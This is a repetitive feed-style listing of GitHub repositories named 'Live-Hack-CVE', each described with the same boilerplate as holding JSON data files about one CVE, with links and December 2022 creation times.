**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4731 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4731](https://github.com/Live-Hack-CVE/CVE-2022-4731) create time: 2022-12-26T09:14:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4735 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4735](https://github.com/Live-Hack-CVE/CVE-2022-4735) create time: 2022-12-26T09:14:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41318 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41318](https://github.com/Live-Hack-CVE/CVE-2022-41318) create time: 2022-12-26T09:14:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41317 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41317](https://github.com/Live-Hack-CVE/CVE-2022-41317) create time: 2022-12-26T09:14:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40005 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40005](https://github.com/Live-Hack-CVE/CVE-2022-40005) create time: 2022-12-26T09:14:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37706 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37706](https://github.com/Live-Hack-CVE/CVE-2022-37706) create time: 2022-12-26T09:14:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4741 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4741](https://github.com/Live-Hack-CVE/CVE-2022-4741) create time: 2022-12-26T09:13:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4740 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4740](https://github.com/Live-Hack-CVE/CVE-2022-4740) create time: 2022-12-26T09:13:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4739 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4739](https://github.com/Live-Hack-CVE/CVE-2022-4739) create time: 2022-12-26T09:13:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4738 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4738](https://github.com/Live-Hack-CVE/CVE-2022-4738) create time: 2022-12-26T09:13:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4737 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4737](https://github.com/Live-Hack-CVE/CVE-2022-4737) create time: 2022-12-26T09:13:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4736 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4736](https://github.com/Live-Hack-CVE/CVE-2022-4736) create time: 2022-12-26T09:13:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37313 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37313](https://github.com/Live-Hack-CVE/CVE-2022-37313) create time: 2022-12-26T09:12:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37312 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37312](https://github.com/Live-Hack-CVE/CVE-2022-37312) create time: 2022-12-26T09:12:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37311 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37311](https://github.com/Live-Hack-CVE/CVE-2022-37311) create time: 2022-12-26T09:12:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37307 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37307](https://github.com/Live-Hack-CVE/CVE-2022-37307) create time: 2022-12-26T09:12:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31469 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31469](https://github.com/Live-Hack-CVE/CVE-2022-31469) create time: 2022-12-26T09:12:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37308 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37308](https://github.com/Live-Hack-CVE/CVE-2022-37308) create time: 2022-12-26T09:11:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37310 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37310](https://github.com/Live-Hack-CVE/CVE-2022-37310) create time: 2022-12-26T09:11:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37309 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37309](https://github.com/Live-Hack-CVE/CVE-2022-37309) create time: 2022-12-26T09:10:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29853 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29853](https://github.com/Live-Hack-CVE/CVE-2022-29853) create time: 2022-12-26T09:10:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29852 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29852](https://github.com/Live-Hack-CVE/CVE-2022-29852) create time: 2022-12-26T09:10:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24120 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24120](https://github.com/Live-Hack-CVE/CVE-2022-24120) create time: 2022-12-26T09:10:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24119 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24119](https://github.com/Live-Hack-CVE/CVE-2022-24119) create time: 2022-12-26T09:10:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24118 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24118](https://github.com/Live-Hack-CVE/CVE-2022-24118) create time: 2022-12-26T09:10:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24117 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24117](https://github.com/Live-Hack-CVE/CVE-2022-24117) create time: 2022-12-26T09:10:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24116 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24116](https://github.com/Live-Hack-CVE/CVE-2022-24116) create time: 2022-12-26T09:10:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2004-0589 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2004-0589](https://github.com/Live-Hack-CVE/CVE-2004-0589) create time: 2022-12-26T08:08:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-5361 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-5361](https://github.com/Live-Hack-CVE/CVE-2015-5361) create time: 2022-12-26T08:09:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-25075 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-25075](https://github.com/Live-Hack-CVE/CVE-2019-25075) create time: 2022-12-26T07:29:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27795 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27795](https://github.com/Live-Hack-CVE/CVE-2020-27795) create time: 2022-12-26T08:17:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27787 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27787](https://github.com/Live-Hack-CVE/CVE-2020-27787) create time: 2022-12-26T08:17:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27788 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27788](https://github.com/Live-Hack-CVE/CVE-2020-27788) create time: 2022-12-26T08:16:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27793 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27793](https://github.com/Live-Hack-CVE/CVE-2020-27793) create time: 2022-12-26T08:16:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27790 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27790](https://github.com/Live-Hack-CVE/CVE-2020-27790) create time: 2022-12-26T08:15:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28590 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28590](https://github.com/Live-Hack-CVE/CVE-2020-28590) create time: 2022-12-26T07:36:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28592 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28592](https://github.com/Live-Hack-CVE/CVE-2020-28592) create time: 2022-12-26T07:36:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28598 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28598](https://github.com/Live-Hack-CVE/CVE-2020-28598) create time: 2022-12-26T07:36:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16297 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16297](https://github.com/Live-Hack-CVE/CVE-2020-16297) create time: 2022-12-26T07:36:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16298 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16298](https://github.com/Live-Hack-CVE/CVE-2020-16298) create time: 2022-12-26T07:36:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16299 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16299](https://github.com/Live-Hack-CVE/CVE-2020-16299) create time: 2022-12-26T07:36:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16296 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16296](https://github.com/Live-Hack-CVE/CVE-2020-16296) create time: 2022-12-26T07:36:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16301 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16301](https://github.com/Live-Hack-CVE/CVE-2020-16301) create time: 2022-12-26T07:36:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16300 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16300](https://github.com/Live-Hack-CVE/CVE-2020-16300) create time: 2022-12-26T07:36:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16295 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16295](https://github.com/Live-Hack-CVE/CVE-2020-16295) create time: 2022-12-26T07:36:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16293 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16293](https://github.com/Live-Hack-CVE/CVE-2020-16293) create time: 2022-12-26T07:35:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16294 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16294](https://github.com/Live-Hack-CVE/CVE-2020-16294) create time: 2022-12-26T07:35:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16290 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16290](https://github.com/Live-Hack-CVE/CVE-2020-16290) create time: 2022-12-26T07:35:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16292 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16292](https://github.com/Live-Hack-CVE/CVE-2020-16292) create time: 2022-12-26T07:35:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16289 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16289](https://github.com/Live-Hack-CVE/CVE-2020-16289) create time: 2022-12-26T07:35:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16291 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16291](https://github.com/Live-Hack-CVE/CVE-2020-16291) create time: 2022-12-26T07:35:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16288 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16288](https://github.com/Live-Hack-CVE/CVE-2020-16288) create time: 2022-12-26T07:35:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16287 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16287](https://github.com/Live-Hack-CVE/CVE-2020-16287) create time: 2022-12-26T07:35:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27836 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27836](https://github.com/Live-Hack-CVE/CVE-2020-27836) create time: 2022-12-26T07:35:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13592 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13592](https://github.com/Live-Hack-CVE/CVE-2020-13592) create time: 2022-12-26T07:34:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35992 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35992](https://github.com/Live-Hack-CVE/CVE-2020-35992) create time: 2022-12-26T07:28:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3442 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3442](https://github.com/Live-Hack-CVE/CVE-2021-3442) create time: 2022-12-26T08:13:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36847 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36847](https://github.com/Live-Hack-CVE/CVE-2021-36847) create time: 2022-12-26T08:13:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36852 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36852](https://github.com/Live-Hack-CVE/CVE-2021-36852) create time: 2022-12-26T08:13:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36857 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36857](https://github.com/Live-Hack-CVE/CVE-2021-36857) create time: 2022-12-26T08:13:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37289 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37289](https://github.com/Live-Hack-CVE/CVE-2021-37289) create time: 2022-12-26T08:12:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3513 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3513](https://github.com/Live-Hack-CVE/CVE-2021-3513) create time: 2022-12-26T08:12:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3659 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3659](https://github.com/Live-Hack-CVE/CVE-2021-3659) create time: 2022-12-26T08:12:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26639 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26639](https://github.com/Live-Hack-CVE/CVE-2021-26639) create time: 2022-12-26T08:10:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24910 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24910](https://github.com/Live-Hack-CVE/CVE-2021-24910) create time: 2022-12-26T08:08:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23179 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23179](https://github.com/Live-Hack-CVE/CVE-2021-23179) create time: 2022-12-26T08:08:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26257 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26257](https://github.com/Live-Hack-CVE/CVE-2021-26257) create time: 2022-12-26T08:08:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33128 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33128](https://github.com/Live-Hack-CVE/CVE-2021-33128) create time: 2022-12-26T07:36:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21821 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21821](https://github.com/Live-Hack-CVE/CVE-2021-21821) create time: 2022-12-26T07:35:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21911 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21911](https://github.com/Live-Hack-CVE/CVE-2021-21911) create time: 2022-12-26T07:35:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21807 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21807](https://github.com/Live-Hack-CVE/CVE-2021-21807) create time: 2022-12-26T07:35:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21809 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21809](https://github.com/Live-Hack-CVE/CVE-2021-21809) create time: 2022-12-26T07:34:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21775 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21775](https://github.com/Live-Hack-CVE/CVE-2021-21775) create time: 2022-12-26T07:34:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21777 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21777](https://github.com/Live-Hack-CVE/CVE-2021-21777) create time: 2022-12-26T07:34:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21833 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21833](https://github.com/Live-Hack-CVE/CVE-2021-21833) create time: 2022-12-26T07:34:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21824 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21824](https://github.com/Live-Hack-CVE/CVE-2021-21824) create time: 2022-12-26T07:34:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25356 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25356](https://github.com/Live-Hack-CVE/CVE-2021-25356) create time: 2022-12-26T07:34:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24911 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24911](https://github.com/Live-Hack-CVE/CVE-2021-24911) create time: 2022-12-26T07:34:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24912 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24912](https://github.com/Live-Hack-CVE/CVE-2021-24912) create time: 2022-12-26T07:34:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3481 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3481](https://github.com/Live-Hack-CVE/CVE-2021-3481) create time: 2022-12-26T07:33:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42627 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42627](https://github.com/Live-Hack-CVE/CVE-2021-42627) create time: 2022-12-26T07:33:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3736 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3736](https://github.com/Live-Hack-CVE/CVE-2021-3736) create time: 2022-12-26T07:33:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3764 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3764](https://github.com/Live-Hack-CVE/CVE-2021-3764) create time: 2022-12-26T07:33:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0887 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0887](https://github.com/Live-Hack-CVE/CVE-2021-0887) create time: 2022-12-26T07:30:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0698 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0698](https://github.com/Live-Hack-CVE/CVE-2021-0698) create time: 2022-12-26T07:30:34Z

